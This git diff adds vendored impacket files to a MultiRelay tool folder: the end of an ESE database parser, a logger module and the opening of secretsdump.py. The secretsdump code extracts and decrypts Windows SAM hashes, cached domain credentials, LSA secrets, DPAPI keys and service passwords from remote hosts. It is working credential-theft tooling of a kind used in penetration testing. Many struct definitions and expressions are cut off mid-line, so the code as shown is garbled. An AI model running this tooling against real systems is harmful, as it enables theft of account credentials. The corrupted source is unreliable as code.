+ Structure.__init__(self,data)
+
+class ESENT_ROOT_HEADER(Structure):
+ structure = (
+ ('InitialNumberOfPages',' 0:
+ # Include the common header
+ self.structure = self.common + self.structure
+ Structure.__init__(self,data)
+
+class ESENT_LEAF_HEADER(Structure):
+ structure = (
+ ('CommonPageKey',':'),
+ )
+
+class ESENT_LEAF_ENTRY(Structure):
+ common = (
+ ('CommonPageKeySize',' 0:
+ # Include the common header
+ self.structure = self.common + self.structure
+ Structure.__init__(self,data)
+
+class ESENT_SPACE_TREE_HEADER(Structure):
+ structure = (
+ ('Unknown','?@[\\]^_`{|}~ ':
+# return x
+# else:
+# return '.'
+#
+#def hexdump(data):
+# x=str(data)
+# strLen = len(x)
+# i = 0
+# while i < strLen:
+# print "%04x " % i,
+# for j in range(16):
+# if i+j < strLen:
+# print "%02X" % ord(x[i+j]),
+#
+# else:
+# print " ",
+# if j%16 == 7:
+# print "",
+# print " ",
+# print ''.join(pretty_print(x) for x in x[i:i+16] )
+# i += 16
+
+def getUnixTime(t):
+ t -= 116444736000000000
+ t //= 10000000
+ return t
+
+class ESENT_PAGE:
+ def __init__(self, db, data=None):
+ self.__DBHeader = db
+ self.data = data
+ self.record = None
+ if data is not None:
+ self.record = ESENT_PAGE_HEADER(self.__DBHeader['Version'], self.__DBHeader['FileFormatRevision'], self.__DBHeader['PageSize'], data)
+
+ def printFlags(self):
+ flags = self.record['PageFlags']
+ if flags & FLAGS_EMPTY:
+ print("\tEmpty")
+ if flags & FLAGS_INDEX:
+ print("\tIndex")
+ if flags & FLAGS_LEAF:
+ print("\tLeaf")
+ else:
+ print("\tBranch")
+ if flags & FLAGS_LONG_VALUE:
+ print("\tLong Value")
+ if flags & FLAGS_NEW_CHECKSUM:
+ print("\tNew Checksum")
+ if flags & FLAGS_NEW_FORMAT:
+ print("\tNew Format")
+ if flags & FLAGS_PARENT:
+ print("\tParent")
+ if flags & FLAGS_ROOT:
+ print("\tRoot")
+ if flags & FLAGS_SPACE_TREE:
+ print("\tSpace Tree")
+
+ def dump(self):
+ baseOffset = len(self.record)
+ self.record.dump()
+ tags = self.data[-4*self.record['FirstAvailablePageTag']:]
+
+ print("FLAGS: ")
+ self.printFlags()
+
+ print()
+
+ for i in range(self.record['FirstAvailablePageTag']):
+ tag = tags[-4:]
+ if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] > 11 and self.__DBHeader['PageSize'] > 8192:
+ valueSize = unpack('> 5
+ #print "TAG FLAG: 0x%x " % (unpack('> 5
+ #print "TAG FLAG: 0x " , ord(self.data[baseOffset+valueOffset:][0])
+ else:
+ valueSize = unpack('> 13
+ valueOffset = unpack(' 0:
+ rootHeader = ESENT_ROOT_HEADER(self.getTag(0)[1])
+ rootHeader.dump()
+ elif self.record['PageFlags'] & FLAGS_LEAF == 0:
+ # Branch Header
+ flags, data = self.getTag(0)
+ branchHeader = ESENT_BRANCH_HEADER(data)
+ branchHeader.dump()
+ else:
+ # Leaf Header
+ flags, data = self.getTag(0)
+ if self.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+ # Space Tree
+ spaceTreeHeader = ESENT_SPACE_TREE_HEADER(data)
+ spaceTreeHeader.dump()
+ else:
+ leafHeader = ESENT_LEAF_HEADER(data)
+ leafHeader.dump()
+
+ # Print the leaf/branch tags
+ for tagNum in range(1,self.record['FirstAvailablePageTag']):
+ flags, data = self.getTag(tagNum)
+ if self.record['PageFlags'] & FLAGS_LEAF == 0:
+ # Branch page
+ branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+ branchEntry.dump()
+ elif self.record['PageFlags'] & FLAGS_LEAF > 0:
+ # Leaf page
+ if self.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+ # Space Tree
+ spaceTreeEntry = ESENT_SPACE_TREE_ENTRY(data)
+ #spaceTreeEntry.dump()
+
+ elif self.record['PageFlags'] & FLAGS_INDEX > 0:
+ # Index Entry
+ indexEntry = ESENT_INDEX_ENTRY(data)
+ #indexEntry.dump()
+ elif self.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+ # Long Page Value
+ raise Exception('Long value still not supported')
+ else:
+ # Table Value
+ leafEntry = ESENT_LEAF_ENTRY(flags, data)
+ dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(leafEntry['EntryData'])
+ dataDefinitionHeader.dump()
+ catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(leafEntry['EntryData'][len(dataDefinitionHeader):])
+ catalogEntry.dump()
+ hexdump(leafEntry['EntryData'])
+
+ def getTag(self, tagNum):
+ if self.record['FirstAvailablePageTag'] < tagNum:
+ raise Exception('Trying to grab an unknown tag 0x%x' % tagNum)
+
+ tags = self.data[-4*self.record['FirstAvailablePageTag']:]
+ baseOffset = len(self.record)
+ for i in range(tagNum):
+ tags = tags[:-4]
+
+ tag = tags[-4:]
+
+ if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] >= 17 and self.__DBHeader['PageSize'] > 8192:
+ valueSize = unpack('> 5
+ tmpData[1] = chr(ord(tmpData[1:2]) & 0x1f)
+ tagData = "".join(tmpData)
+ else:
+ valueSize = unpack('> 13
+ valueOffset = unpack(' 127:
+ numEntries = dataDefinitionHeader['LastVariableDataType'] - 127
+ else:
+ numEntries = dataDefinitionHeader['LastVariableDataType']
+
+ itemLen = unpack(' 0:
+ # Leaf page
+ if page.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+ pass
+ elif page.record['PageFlags'] & FLAGS_INDEX > 0:
+ pass
+ elif page.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+ pass
+ else:
+ # Table Value
+ leafEntry = ESENT_LEAF_ENTRY(flags, data)
+ self.__addItem(leafEntry)
+
+ def parseCatalog(self, pageNum):
+ # Parse all the pages starting at pageNum and commit table data
+ page = self.getPage(pageNum)
+ self.parsePage(page)
+
+ for i in range(1, page.record['FirstAvailablePageTag']):
+ flags, data = page.getTag(i)
+ if page.record['PageFlags'] & FLAGS_LEAF == 0:
+ # Branch page
+ branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+ self.parseCatalog(branchEntry['ChildPageNumber'])
+
+
+ def readHeader(self):
+ LOG.debug("Reading Boot Sector for %s" % self.__volumeName)
+
+ def getPage(self, pageNum):
+ LOG.debug("Trying to fetch page %d (0x%x)" % (pageNum, (pageNum+1)*self.__pageSize))
+ self.__DB.seek((pageNum+1)*self.__pageSize, 0)
+ data = self.__DB.read(self.__pageSize)
+ while len(data) < self.__pageSize:
+ remaining = self.__pageSize - len(data)
+ data += self.__DB.read(remaining)
+ # Special case for the first page
+ if pageNum <= 0:
+ return data
+ else:
+ return ESENT_PAGE(self.__DBHeader, data)
+
+ def close(self):
+ self.__DB.close()
+
+ def openTable(self, tableName):
+ # Returns a cursos for later use
+
+ if isinstance(tableName, bytes) is not True:
+ tableName = b(tableName)
+
+ if tableName in self.__tables:
+ entry = self.__tables[tableName]['TableEntry']
+ dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+ catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(entry['EntryData'][len(dataDefinitionHeader):])
+
+ # Let's position the cursor at the leaf levels for fast reading
+ pageNum = catalogEntry['FatherDataPageNumber']
+ done = False
+ while done is False:
+ page = self.getPage(pageNum)
+ if page.record['FirstAvailablePageTag'] <= 1:
+ # There are no records
+ done = True
+ for i in range(1, page.record['FirstAvailablePageTag']):
+ flags, data = page.getTag(i)
+ if page.record['PageFlags'] & FLAGS_LEAF == 0:
+ # Branch page, move on to the next page
+ branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+ pageNum = branchEntry['ChildPageNumber']
+ break
+ else:
+ done = True
+ break
+
+ cursor = TABLE_CURSOR
+ cursor['TableData'] = self.__tables[tableName]
+ cursor['FatherDataPageNumber'] = catalogEntry['FatherDataPageNumber']
+ cursor['CurrentPageData'] = page
+ cursor['CurrentTag'] = 0
+ return cursor
+ else:
+ return None
+
+ def __getNextTag(self, cursor):
+ page = cursor['CurrentPageData']
+
+ if cursor['CurrentTag'] >= page.record['FirstAvailablePageTag']:
+ # No more data in this page, chau
+ return None
+
+ flags, data = page.getTag(cursor['CurrentTag'])
+ if page.record['PageFlags'] & FLAGS_LEAF > 0:
+ # Leaf page
+ if page.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+ raise Exception('FLAGS_SPACE_TREE > 0')
+ elif page.record['PageFlags'] & FLAGS_INDEX > 0:
+ raise Exception('FLAGS_INDEX > 0')
+ elif page.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+ raise Exception('FLAGS_LONG_VALUE > 0')
+ else:
+ # Table Value
+ leafEntry = ESENT_LEAF_ENTRY(flags, data)
+ return leafEntry
+
+ return None
+
+ def getNextRow(self, cursor):
+ cursor['CurrentTag'] += 1
+
+ tag = self.__getNextTag(cursor)
+ #hexdump(tag)
+
+ if tag is None:
+ # No more tags in this page, search for the next one on the right
+ page = cursor['CurrentPageData']
+ if page.record['NextPageNumber'] == 0:
+ # No more pages, chau
+ return None
+ else:
+ cursor['CurrentPageData'] = self.getPage(page.record['NextPageNumber'])
+ cursor['CurrentTag'] = 0
+ return self.getNextRow(cursor)
+ else:
+ return self.__tagToRecord(cursor, tag['EntryData'])
+
+ def __tagToRecord(self, cursor, tag):
+ # So my brain doesn't forget, the data record is composed of:
+ # Header
+ # Fixed Size Data (ID < 127)
+ # The easiest to parse. Their size is fixed in the record. You can get its size
+ # from the Column Record, field SpaceUsage
+ # Variable Size Data (127 < ID < 255)
+ # At VariableSizeOffset you get an array of two bytes per variable entry, pointing
+ # to the length of the value. Values start at:
+ # numEntries = LastVariableDataType - 127
+ # VariableSizeOffset + numEntries * 2 (bytes)
+ # Tagged Data ( > 255 )
+ # After the Variable Size Value, there's more data for the tagged values.
+ # Right at the beginning there's another array (taggedItems), pointing to the
+ # values, size.
+ #
+ # The interesting thing about this DB records is there's no need for all the columns to be there, hence
+ # saving space. That's why I got over all the columns, and if I find data (of any type), i assign it. If
+ # not, the column's empty.
+ #
+ # There are a lot of caveats in the code, so take your time to explore it.
+ #
+ # ToDo: Better complete this description
+ #
+
+ record = OrderedDict()
+ taggedItems = OrderedDict()
+ taggedItemsParsed = False
+
+ dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(tag)
+ #dataDefinitionHeader.dump()
+ variableDataBytesProcessed = (dataDefinitionHeader['LastVariableDataType'] - 127) * 2
+ prevItemLen = 0
+ tagLen = len(tag)
+ fixedSizeOffset = len(dataDefinitionHeader)
+ variableSizeOffset = dataDefinitionHeader['VariableSizeOffset']
+
+ columns = cursor['TableData']['Columns']
+
+ for column in list(columns.keys()):
+ columnRecord = columns[column]['Record']
+ #columnRecord.dump()
+ if columnRecord['Identifier'] <= dataDefinitionHeader['LastFixedSize']:
+ # Fixed Size column data type, still available data
+ record[column] = tag[fixedSizeOffset:][:columnRecord['SpaceUsage']]
+ fixedSizeOffset += columnRecord['SpaceUsage']
+
+ elif 127 < columnRecord['Identifier'] <= dataDefinitionHeader['LastVariableDataType']:
+ # Variable data type
+ index = columnRecord['Identifier'] - 127 - 1
+ itemLen = unpack(' 255:
+ # Have we parsed the tagged items already?
+ if taggedItemsParsed is False and (variableDataBytesProcessed+variableSizeOffset) < tagLen:
+ index = variableDataBytesProcessed+variableSizeOffset
+ #hexdump(tag[index:])
+ endOfVS = self.__pageSize
+ firstOffsetTag = (unpack('= 17 and self.__DBHeader['PageSize'] > 8192:
+ flagsPresent = 1
+ else:
+ flagsPresent = (unpack('= firstOffsetTag:
+ # We reached the end of the variable size array
+ break
+
+ # Calculate length of variable items
+ # Ugly.. should be redone
+ prevKey = list(taggedItems.keys())[0]
+ for i in range(1,len(taggedItems)):
+ offset0, length, flags = taggedItems[prevKey]
+ offset, _, _ = list(taggedItems.items())[i][1]
+ taggedItems[prevKey] = (offset0, offset-offset0, flags)
+ #print "ID: %d, Offset: %d, Len: %d, flags: %d" % (prevKey, offset0, offset-offset0, flags)
+ prevKey = list(taggedItems.keys())[i]
+ taggedItemsParsed = True
+
+ # Tagged data type
+ if columnRecord['Identifier'] in taggedItems:
+ offsetItem = variableDataBytesProcessed + variableSizeOffset + taggedItems[columnRecord['Identifier']][0]
+ itemSize = taggedItems[columnRecord['Identifier']][1]
+ # If item have flags, we should skip them
+ if taggedItems[columnRecord['Identifier']][2] > 0:
+ itemFlag = ord(tag[offsetItem:offsetItem+1])
+ offsetItem += 1
+ itemSize -= 1
+ else:
+ itemFlag = 0
+
+ #print "ID: %d, itemFlag: 0x%x" %( columnRecord['Identifier'], itemFlag)
+ if itemFlag & (TAGGED_DATA_TYPE_COMPRESSED ):
+ LOG.error('Unsupported tag column: %s, flag:0x%x' % (column, itemFlag))
+ record[column] = None
+ elif itemFlag & TAGGED_DATA_TYPE_MULTI_VALUE:
+ # ToDo: Parse multi-values properly
+ LOG.debug('Multivalue detected in column %s, returning raw results' % (column))
+ record[column] = (hexlify(tag[offsetItem:][:itemSize]),)
+ else:
+ record[column] = tag[offsetItem:][:itemSize]
+
+ else:
+ record[column] = None
+ else:
+ record[column] = None
+
+ # If we understand the data type, we unpack it and cast it accordingly
+ # otherwise, we just encode it in hex
+ if type(record[column]) is tuple:
+ # A multi value data, we won't decode it, just leave it this way
+ record[column] = record[column][0]
+ elif columnRecord['ColumnType'] == JET_coltypText or columnRecord['ColumnType'] == JET_coltypLongText:
+ # Let's handle strings
+ if record[column] is not None:
+ if columnRecord['CodePage'] not in StringCodePages:
+ raise Exception('Unknown codepage 0x%x'% columnRecord['CodePage'])
+ stringDecoder = StringCodePages[columnRecord['CodePage']]
+
+ try:
+ record[column] = record[column].decode(stringDecoder)
+ except Exception:
+ LOG.debug("Exception:", exc_info=True)
+ LOG.debug('Fixing Record[%r][%d]: %r' % (column, columnRecord['ColumnType'], record[column]))
+ record[column] = record[column].decode(stringDecoder, "replace")
+ pass
+ else:
+ unpackData = ColumnTypeSize[columnRecord['ColumnType']]
+ if record[column] is not None:
+ if unpackData is None:
+ record[column] = hexlify(record[column])
+ else:
+ unpackStr = unpackData[1]
+ record[column] = unpack(unpackStr, record[column])[0]
+
+ return record
diff --git a/tools/MultiRelay/impacket-dev/impacket/examples/__init__.py b/tools/MultiRelay/impacket-dev/impacket/examples/__init__.py
new file mode 100644
index 0000000..2ae2839
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/examples/__init__.py
@@ -0,0 +1 @@
+pass
diff --git a/tools/MultiRelay/impacket-dev/impacket/examples/logger.py b/tools/MultiRelay/impacket-dev/impacket/examples/logger.py
new file mode 100644
index 0000000..e9acb6c
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/examples/logger.py
@@ -0,0 +1,59 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description: This logger is intended to be used by impacket instead
+# of printing directly. This will allow other libraries to use their
+# custom logging implementation.
+#
+
+import logging
+import sys
+
+# This module can be used by scripts using the Impacket library
+# in order to configure the root logger to output events
+# generated by the library with a predefined format
+
+# If the scripts want to generate log entries, they can write
+# directly to the root logger (logging.info, debug, etc).
+
+class ImpacketFormatter(logging.Formatter):
+ '''
+ Prefixing logged messages through the custom attribute 'bullet'.
+ '''
+ def __init__(self):
+ logging.Formatter.__init__(self,'%(bullet)s %(message)s', None)
+
+ def format(self, record):
+ if record.levelno == logging.INFO:
+ record.bullet = '[*]'
+ elif record.levelno == logging.DEBUG:
+ record.bullet = '[+]'
+ elif record.levelno == logging.WARNING:
+ record.bullet = '[!]'
+ else:
+ record.bullet = '[-]'
+
+ return logging.Formatter.format(self, record)
+
+class ImpacketFormatterTimeStamp(ImpacketFormatter):
+ '''
+ Prefixing logged messages through the custom attribute 'bullet'.
+ '''
+ def __init__(self):
+ logging.Formatter.__init__(self,'[%(asctime)-15s] %(bullet)s %(message)s', None)
+
+ def formatTime(self, record, datefmt=None):
+ return ImpacketFormatter.formatTime(self, record, datefmt="%Y-%m-%d %H:%M:%S")
+
+def init(ts=False):
+ # We add a StreamHandler and formatter to the root logger
+ handler = logging.StreamHandler(sys.stdout)
+ if not ts:
+ handler.setFormatter(ImpacketFormatter())
+ else:
+ handler.setFormatter(ImpacketFormatterTimeStamp())
+ logging.getLogger().addHandler(handler)
+ logging.getLogger().setLevel(logging.INFO)
diff --git a/tools/MultiRelay/impacket-dev/impacket/examples/secretsdump.py b/tools/MultiRelay/impacket-dev/impacket/examples/secretsdump.py
new file mode 100644
index 0000000..6728caa
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/examples/secretsdump.py
@@ -0,0 +1,1905 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description: Performs various techniques to dump hashes from the
+# remote machine without executing any agent there.
+# For SAM and LSA Secrets (including cached creds)
+# we try to read as much as we can from the registry
+# and then we save the hives in the target system
+# (%SYSTEMROOT%\\Temp dir) and read the rest of the
+# data from there.
+# For NTDS.dit we either:
+# a. Get the domain users list and get its hashes
+# and Kerberos keys using [MS-DRDS] DRSGetNCChanges()
+# call, replicating just the attributes we need.
+# b. Extract NTDS.dit via vssadmin executed with the
+# smbexec approach.
+# It's copied on the temp dir and parsed remotely.
+#
+# The script initiates the services required for its working
+# if they are not available (e.g. Remote Registry, even if it is
+# disabled). After the work is done, things are restored to the
+# original state.
+#
+# Author:
+# Alberto Solino (@agsolino)
+#
+# References: Most of the work done by these guys. I just put all
+# the pieces together, plus some extra magic.
+#
+# https://github.com/gentilkiwi/kekeo/tree/master/dcsync
+# https://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
+# https://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
+# https://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
+# https://web.archive.org/web/20130901115208/www.quarkslab.com/en-blog+read+13
+# https://code.google.com/p/creddump/
+# https://lab.mediaservice.net/code/cachedump.rb
+# https://insecurety.net/?p=768
+# http://www.beginningtoseethelight.org/ntsecurity/index.htm
+# https://www.exploit-db.com/docs/english/18244-active-domain-offline-hash-dump-&-forensic-analysis.pdf
+# https://www.passcape.com/index.php?section=blog&cmd=details&id=15
+#
+from __future__ import division
+from __future__ import print_function
+import codecs
+import hashlib
+import logging
+import ntpath
+import os
+import random
+import string
+import time
+from binascii import unhexlify, hexlify
+from collections import OrderedDict
+from datetime import datetime
+from struct import unpack, pack
+from six import b, PY2
+
+from impacket import LOG
+from impacket import system_errors
+from impacket import winregistry, ntlm
+from impacket.ese import ESENT_DB
+from impacket.dpapi import DPAPI_SYSTEM
+from impacket.nt_errors import STATUS_MORE_ENTRIES
+from impacket.structure import Structure
+from impacket.structure import hexdump
+from impacket.uuid import string_to_bin
+from impacket.crypto import transformKey
+
+try:
+ from Cryptodome.Cipher import DES, ARC4, AES
+ from Cryptodome.Hash import HMAC, MD4, MD5
+except ImportError:
+ LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
+ LOG.critical("See https://pypi.org/project/pycryptodomex/")
+
+
+# Structures
+# Taken from https://insecurety.net/?p=768
+class SAM_KEY_DATA(Structure):
+ structure = (
+ ('Revision','L',self['SubAuthority'][i*4:i*4+4])[0])
+ return ans
+
+class LSA_SECRET_BLOB(Structure):
+ structure = (
+ ('Length','=0:
+ if tries >= 3:
+ raise e
+ # Stuff didn't finish yet.. wait more
+ time.sleep(5)
+ tries += 1
+ pass
+ else:
+ raise e
+ else:
+ break
+
+ def seek(self, offset, whence):
+ # Implement whence, for now it's always from the beginning of the file
+ if whence == 0:
+ self.__currentOffset = offset
+
+ def read(self, bytesToRead):
+ if bytesToRead > 0:
+ data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
+ self.__currentOffset += len(data)
+ return data
+ return b''
+
+ def close(self):
+ if self.__fid is not None:
+ self.__smbConnection.closeFile(self.__tid, self.__fid)
+ self.__smbConnection.deleteFile('ADMIN$', self.__fileName)
+ self.__fid = None
+
+ def tell(self):
+ return self.__currentOffset
+
+ def __str__(self):
+ return "\\\\%s\\ADMIN$\\%s" % (self.__smbConnection.getRemoteHost(), self.__fileName)
+
+class CryptoCommon:
+ # Common crypto stuff used over different classes
+ def deriveKey(self, baseKey):
+ # 2.2.11.1.3 Deriving Key1 and Key2 from a Little-Endian, Unsigned Integer Key
+ # Let I be the little-endian, unsigned integer.
+ # Let I[X] be the Xth byte of I, where I is interpreted as a zero-base-index array of bytes.
+ # Note that because I is in little-endian byte order, I[0] is the least significant byte.
+ # Key1 is a concatenation of the following values: I[0], I[1], I[2], I[3], I[0], I[1], I[2].
+ # Key2 is a concatenation of the following values: I[3], I[0], I[1], I[2], I[3], I[0], I[1]
+ key = pack('= 20:
+ lmHash = self.__decryptHash(rid, encLMHash, LMPASSWORD, newStyle)
+ else:
+ lmHash = b''
+
+ if encNTHash != b'':
+ ntHash = self.__decryptHash(rid, encNTHash, NTPASSWORD, newStyle)
+ else:
+ ntHash = b''
+
+ if lmHash == b'':
+ lmHash = ntlm.LMOWFv1('','')
+ if ntHash == b'':
+ ntHash = ntlm.NTOWFv1('','')
+
+ answer = "%s:%d:%s:%s:::" % (userName, rid, hexlify(lmHash).decode('utf-8'), hexlify(ntHash).decode('utf-8'))
+ self.__itemsFound[rid] = answer
+ self.__perSecretCallback(answer)
+
+ def export(self, baseFileName, openFileFunc = None):
+ if len(self.__itemsFound) > 0:
+ items = sorted(self.__itemsFound)
+ fileName = baseFileName+'.sam'
+ fd = openFile(fileName, openFileFunc=openFileFunc)
+ for item in items:
+ fd.write(self.__itemsFound[item]+'\n')
+ fd.close()
+ return fileName
+
+class LSASecrets(OfflineRegistry):
+ UNKNOWN_USER = '(Unknown User)'
+ class SECRET_TYPE:
+ LSA = 0
+ LSA_HASHED = 1
+ LSA_RAW = 2
+ LSA_KERBEROS = 3
+
+ def __init__(self, securityFile, bootKey, remoteOps=None, isRemote=False, history=False,
+ perSecretCallback=lambda secretType, secret: _print_helper(secret)):
+ OfflineRegistry.__init__(self, securityFile, isRemote)
+ self.__hashedBootKey = b''
+ self.__bootKey = bootKey
+ self.__LSAKey = b''
+ self.__NKLMKey = b''
+ self.__vistaStyle = True
+ self.__cryptoCommon = CryptoCommon()
+ self.__securityFile = securityFile
+ self.__remoteOps = remoteOps
+ self.__cachedItems = []
+ self.__secretItems = []
+ self.__perSecretCallback = perSecretCallback
+ self.__history = history
+
+ def MD5(self, data):
+ md5 = hashlib.new('md5')
+ md5.update(data)
+ return md5.digest()
+
+ def __sha256(self, key, value, rounds=1000):
+ sha = hashlib.sha256()
+ sha.update(key)
+ for i in range(1000):
+ sha.update(value)
+ return sha.digest()
+
+ def __decryptSecret(self, key, value):
+ # [MS-LSAD] Section 5.1.2
+ plainText = b''
+
+ encryptedSecretSize = unpack(' 0:
+ return data + (data & 0x3)
+ else:
+ return data
+
+ def dumpCachedHashes(self):
+ if self.__securityFile is None:
+ # No SECURITY file provided
+ return
+
+ LOG.info('Dumping cached domain logon information (domain/username:hash)')
+
+ # Let's first see if there are cached entries
+ values = self.enumValues('\\Cache')
+ if values is None:
+ # No cache entries
+ return
+ try:
+ # Remove unnecessary value
+ values.remove(b'NL$Control')
+ except:
+ pass
+
+ iterationCount = 10240
+
+ if b'NL$IterationCount' in values:
+ values.remove(b'NL$IterationCount')
+
+ record = self.getValue('\\Cache\\NL$IterationCount')[1]
+ if record > 10240:
+ iterationCount = record & 0xfffffc00
+ else:
+ iterationCount = record * 1024
+
+ self.__getLSASecretKey()
+ self.__getNLKMSecret()
+
+ for value in values:
+ LOG.debug('Looking into %s' % value.decode('utf-8'))
+ record = NL_RECORD(self.getValue(ntpath.join('\\Cache',value.decode('utf-8')))[1])
+ if record['IV'] != 16 * b'\x00':
+ #if record['UserLength'] > 0:
+ if record['Flags'] & 1 == 1:
+ # Encrypted
+ if self.__vistaStyle is True:
+ plainText = self.__cryptoCommon.decryptAES(self.__NKLMKey[16:32], record['EncryptedData'], record['IV'])
+ else:
+ plainText = self.__decryptHash(self.__NKLMKey, record['EncryptedData'], record['IV'])
+ pass
+ else:
+ # Plain! Until we figure out what this is, we skip it
+ #plainText = record['EncryptedData']
+ continue
+ encHash = plainText[:0x10]
+ plainText = plainText[0x48:]
+ userName = plainText[:record['UserLength']].decode('utf-16le')
+ plainText = plainText[self.__pad(record['UserLength']) + self.__pad(record['DomainNameLength']):]
+ domainLong = plainText[:self.__pad(record['DnsDomainNameLength'])].decode('utf-16le')
+
+ if self.__vistaStyle is True:
+ answer = "%s/%s:$DCC2$%s#%s#%s" % (domainLong, userName, iterationCount, userName, hexlify(encHash).decode('utf-8'))
+ else:
+ answer = "%s/%s:%s:%s" % (domainLong, userName, hexlify(encHash).decode('utf-8'), userName)
+
+ self.__cachedItems.append(answer)
+ self.__perSecretCallback(LSASecrets.SECRET_TYPE.LSA_HASHED, answer)
+
+ def __printSecret(self, name, secretItem):
+ # Based on [MS-LSAD] section 3.1.1.4
+
+ # First off, let's discard NULL secrets.
+ if len(secretItem) == 0:
+ LOG.debug('Discarding secret %s, NULL Data' % name)
+ return
+
+ # We might have secrets with zero
+ if secretItem.startswith(b'\x00\x00'):
+ LOG.debug('Discarding secret %s, all zeros' % name)
+ return
+
+ upperName = name.upper()
+
+ LOG.info('%s ' % name)
+
+ secret = ''
+
+ if upperName.startswith('_SC_'):
+ # Service name, a password might be there
+ # Let's first try to decode the secret
+ try:
+ strDecoded = secretItem.decode('utf-16le')
+ except:
+ pass
+ else:
+ # We have to get the account the service
+ # runs under
+ if hasattr(self.__remoteOps, 'getServiceAccount'):
+ account = self.__remoteOps.getServiceAccount(name[4:])
+ if account is None:
+ secret = self.UNKNOWN_USER + ':'
+ else:
+ secret = "%s:" % account
+ else:
+ # We don't support getting this info for local targets at the moment
+ secret = self.UNKNOWN_USER + ':'
+ secret += strDecoded
+ elif upperName.startswith('DEFAULTPASSWORD'):
+ # defaults password for winlogon
+ # Let's first try to decode the secret
+ try:
+ strDecoded = secretItem.decode('utf-16le')
+ except:
+ pass
+ else:
+ # We have to get the account this password is for
+ if hasattr(self.__remoteOps, 'getDefaultLoginAccount'):
+ account = self.__remoteOps.getDefaultLoginAccount()
+ if account is None:
+ secret = self.UNKNOWN_USER + ':'
+ else:
+ secret = "%s:" % account
+ else:
+ # We don't support getting this info for local targets at the moment
+ secret = self.UNKNOWN_USER + ':'
+ secret += strDecoded
+ elif upperName.startswith('ASPNET_WP_PASSWORD'):
+ try:
+ strDecoded = secretItem.decode('utf-16le')
+ except:
+ pass
+ else:
+ secret = 'ASPNET: %s' % strDecoded
+ elif upperName.startswith('DPAPI_SYSTEM'):
+ # Decode the DPAPI Secrets
+ dpapi = DPAPI_SYSTEM(secretItem)
+ secret = "dpapi_machinekey:0x{0}\ndpapi_userkey:0x{1}".format( hexlify(dpapi['MachineKey']).decode('latin-1'),
+ hexlify(dpapi['UserKey']).decode('latin-1'))
+ elif upperName.startswith('$MACHINE.ACC'):
+ # compute MD4 of the secret.. yes.. that is the nthash? :-o
+ md4 = MD4.new()
+ md4.update(secretItem)
+ if hasattr(self.__remoteOps, 'getMachineNameAndDomain'):
+ machine, domain = self.__remoteOps.getMachineNameAndDomain()
+ printname = "%s\\%s$" % (domain, machine)
+ secret = "%s\\%s$:%s:%s:::" % (domain, machine, hexlify(ntlm.LMOWFv1('','')).decode('utf-8'),
+ hexlify(md4.digest()).decode('utf-8'))
+ else:
+ printname = "$MACHINE.ACC"
+ secret = "$MACHINE.ACC: %s:%s" % (hexlify(ntlm.LMOWFv1('','')).decode('utf-8'),
+ hexlify(md4.digest()).decode('utf-8'))
+ # Attempt to calculate and print Kerberos keys
+ if not self.__printMachineKerberos(secretItem, printname):
+ LOG.debug('Could not calculate machine account Kerberos keys, only printing plain password (hex encoded)')
+ # Always print plaintext anyway since this may be needed for some popular usecases
+ extrasecret = "%s:plain_password_hex:%s" % (printname, hexlify(secretItem).decode('utf-8'))
+ self.__secretItems.append(extrasecret)
+ self.__perSecretCallback(LSASecrets.SECRET_TYPE.LSA, extrasecret)
+
+ if secret != '':
+ printableSecret = secret
+ self.__secretItems.append(secret)
+ self.__perSecretCallback(LSASecrets.SECRET_TYPE.LSA, printableSecret)
+ else:
+ # Default print, hexdump
+ printableSecret = '%s:%s' % (name, hexlify(secretItem).decode('utf-8'))
+ self.__secretItems.append(printableSecret)
+ # If we're using the default callback (ourselves), we print the hex representation. If not, the
+ # user will need to decide what to do.
+ if self.__module__ == self.__perSecretCallback.__module__:
+ hexdump(secretItem)
+ self.__perSecretCallback(LSASecrets.SECRET_TYPE.LSA_RAW, printableSecret)
+
+ def __printMachineKerberos(self, rawsecret, machinename):
+ # Attempt to create Kerberos keys from machine account (if possible)
+ if hasattr(self.__remoteOps, 'getMachineKerberosSalt'):
+ salt = self.__remoteOps.getMachineKerberosSalt()
+ if salt == b'':
+ return False
+ else:
+ allciphers = [
+ int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+ int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+ int(constants.EncryptionTypes.des_cbc_md5.value)
+ ]
+ # Ok, so the machine account password is in raw UTF-16, BUT can contain any amount
+ # of invalid unicode characters.
+ # This took me (Dirk-jan) way too long to figure out, but apparently Microsoft
+ # implicitly replaces those when converting utf-16 to utf-8.
+ # When we use the same method we get the valid password -> key mapping :)
+ rawsecret = rawsecret.decode('utf-16-le', 'replace').encode('utf-8', 'replace')
